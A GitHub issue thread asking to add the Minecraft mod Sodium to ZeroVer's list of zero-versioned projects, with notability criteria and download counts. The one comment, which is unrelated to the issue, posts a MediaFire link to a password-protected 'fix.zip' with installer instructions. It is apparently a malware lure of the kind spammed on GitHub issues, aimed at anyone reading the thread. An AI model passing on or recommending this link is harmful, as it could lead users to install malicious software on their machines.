### ISSUE TITLE
Add project: Sodium

### ISSUE THREAD

**Issue by HyperSoop** [mahmoud/zerover#190]
## Basic info

**Project name**: Sodium
**Project link**: https://github.com/CaffeineMC/sodium-fabric

## Qualifications

[ZeroVer](https://zerover.org)'s patent-pending zero-based versioning
scheme can obviously be used by everyone, but not every usage is
necessarily notable. Check that the first and at least one other
criterion apply:

- [x] A current ZeroVer-compliant version (`0.*`) or long history of ZeroVer usage, and
- [x] Very wide exposure (i.e., 1,000+ GitHub stars), or
- [ ] Active promotion as part of a paid product or service (e.g., Hashicorp Vault), or
- [x] Relative maturity and infrastructural importance (e.g., Compiz, docutils)

## Additional notability info

Sodium is used by a lot of the Minecraft community with over 18 million downloads on modrinth alone, many other projects in its niche are built against it or include it.

---

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
